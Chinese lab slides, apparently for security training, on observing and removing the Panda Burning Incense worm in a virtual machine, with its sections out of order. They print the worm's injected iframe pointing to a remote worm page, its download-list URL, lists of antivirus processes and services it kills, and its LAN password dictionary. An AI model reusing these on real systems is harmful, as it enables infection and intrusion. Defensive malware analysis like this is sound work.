6。Panda熊猫烧香病毒查杀实验

9.4.2. 结束以下进程： Mcshield.exe;VsTskMgr.exe;naPrdMgr.exe;UpdaterUI.exe;TBMon.exe;scan32.exe;R avmond.exe;CCenter.exe;RavTask.exe;Rav.exe;Ravmon.exe;RavmonD.exe;RavStub. exe;KVXP.kxp;KvMonXP.kxp;KVCenter.kxp;KVSrvXP.exe;KRegEx.exe;UIHost.exe;Troj Die.kxp;FrogAgent.exe;Logo1_.exe;Logo_1.exe;Rundl132.exe;regedit.exe;msconfig. exe;taskmgr.exe 9.4.3. 关闭并删除以下服务： Schedule;sharedaccess;RsCCenter;RsRavMon;RsCCenter;KVWSC;KVSrvXP;kavsvc;A VP;McAfeeFramework;McShield;McTaskManager;navapsvc;wscsvc;KPfwSvc;SNDSr vc;ccProxy;ccEvtMgr;ccSetMgr;SPBBCSvc;Symantec Core LC;NPFMntor;MskService;FireSvc 注: 因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有 利用安全漏洞进行病毒传播的链接.如果一台服务器被感染将大大增加病毒传 播的范围。
病毒类型 蠕虫病毒 6. 病毒大小 AxCmd.exe 317KB GameSetup.exe 39KB 7. 传播方式 本地磁盘感染，局域网传播 8. 病毒特征 这是一个感染型的蠕虫病毒，它能感染系统中exe，com， pif，src，html，asp等文件，它还能中止大量的反病毒软件进 程并且会删除扩展名为gho的文件，该文件是一系统备份工具 GHOST的备份文件，使用户的系统备份文件丢失。其中能感 染文件的版本使被感染的用户系统中所有.exe可执行文件全部 被改成熊猫举着三根香的模样。 9. 病毒行为 该病毒的主要行为(针对GameSetup.exe) 5.
9.1. 传播 9.1.1. 本地磁盘感染 病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的 磁盘进行 文件遍历感染注:不感染文件大小超过10485760字节以上的. (病毒将不感染如下目录的文件): Microsoft Frontpage;Movie Maker;MSN Gamin Zone;Common Files;Windows NT;Recycled;System Volume Information;Documents and Settings;.... (病毒将不感染文件名如下的文件): setup.exe;NTDETECT.COM 病毒将使用两类感染方式应对不同后缀的文件名进行感染。 1） 二进制可执行文件(后缀后为:EXE,SCR,PIF,COM) 将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感 染. 2） 脚本类(后缀名为:htm,html,asp,php,jsp,aspx) 在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞): <iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe> 3） 在感染时会删除这些磁盘上的后缀名为.GHO 感染后在当前文件夹下新建一Desktop_.ini文件，写上当前日期标记已被感染
9.2. 修改操作系统的启动关联 病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以1 秒钟为周期不断设置如下键值: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare=%病毒文件路径% HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue=0用以禁止显示隐藏文件。 9.3. 下载文件启动 病毒会以20分钟为周期尝试读取特定网站上的下载文件列表 如:http://wangma.9966.org/down.txt并根据文件列表指定的文件下载,并启动这 些程序. 9.4. 与杀毒软件对抗 9.4.1. 关闭包含以下字符串的窗口： 防火墙;VirusScan;NOD32;网镖;杀毒;毒霸;瑞星;超级兔子;优化大师;木马清道夫; 木馬清道夫;卡巴斯基反病毒;Symantec AntiVirus;Duba;esteem procs;绿鹰PC;密 码防盗;噬菌体;木马辅助查找器;System Safety Monitor;Wrapped gift Killer;Winsock Expert;游戏木马检测大师;超级巡警;IceSword
9.1.2. 生成autorun.inf 病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联 使病毒在用户点击被感染磁盘时能被自动运行。这两个文件需在重启机器后起作用。 9.1.3. 局域网传播 病毒生成随机个局域网传播线程实现如下的传播方式: 当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码 字典进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任 务将病毒体拷贝到网络计算机的文件夹中：'\Documents and Settings\All Users\Start Menu\Programs\Startup\', '\Documents and Settings\All Users\「开始」菜单\程序\启动\'， '\WINDOWS\Start Menu\Programs\Startup\'。 启动激活病毒。 被尝试猜测密码的账户号为: Administrator;Guest;admin;Root 用来进行密码尝试的字典为: 1234;password;6969;harley;123456;golf;pussy;mustang;1111;shadow;1313;fish;5150;7777;q werty;baseball;2112;letmein;mein;12345678;12345;admin;5201314;qq520;1234567;123456 789;654321;54321;000000;11111111;88888888;pass;passwd;database;abcd;abc123;Sybase; 123qwe;server;computer;super;123asd;ihavenopass;godblessyou;enable;2002;2003;2600;al pha;111111;121212;123123;1234qwer;123abc;Patrick;administrator;ator;root;fuckyou;fuck;t est;test123;temp;temp123;asdf;qwer;yxcv;zxcv;home;owner;login;Login;pw123;love;mypc;m ypc123;admin123;mypass;mypass123;901100
一、实训目的 二、实训知识准备 三、实训要求 四、实训环境
通过对熊猫烧香病毒两个变种的分析、观察、查杀，了解此类病 毒的特点。并熟悉安全模式杀毒，及利用工具修复被感染文件的方法。
1.
2. 3.
4.
病毒名称 熊猫烧香Worm.Nimaya 病毒别名 Virus.Win32.EvilPanda 病毒文件信息 3.1. Worm.Nimaya.at AxCmd.exe MD5:121911e0995c530bad4ec8c98ba3003e SHA1:b6d1bda8fbf5609db8a22d359178345231b7c8ea 壳:无 3.2. Worm.Nimaya.ah GameSetup.exe MD5:13128116337312a09752837fef762de0 SHA1:0687a0abbd74e45e06cc0fa434af07af3e2e27d4 壳:UPolyX v0.5 影响系统 Win 9X/ME/NT/2000/XP/2003
学员在虚拟机中激活病毒Worm.Nimaya.at（AxCmd.exe），并按步 骤对系统进行观察，分析病毒行为，最后对病毒进行查杀。过程中应 对步骤进行相应记录，有问题及时提出。注意主机安全。 Worm.Nimaya.ah（GameSetup.exe）可作为补充练习，学员可对 两者差异进行比较。
Any question？
12
1. 2.
3. 4.Fra Baidu bibliotek
pc一台，安装有Vmware5.5以上版本；虚拟机中最好安 装有WinXP版本。 在可以感染的目录下准备一些exe，gho，htm文件及其 他各种能被感染 的文件类型，以备检查（如果没有 ghost备份也可以手动制作一个假的gho文件，只 要后缀名为gho即可） 病毒文件AxCmd.exe及Gamesetup.exe（可放在同一目 录下） 专杀工具:AntiUnknown熊猫烧香专杀工具（上Google或 者百度，以熊猫烧香和专杀作为关键字进行搜索）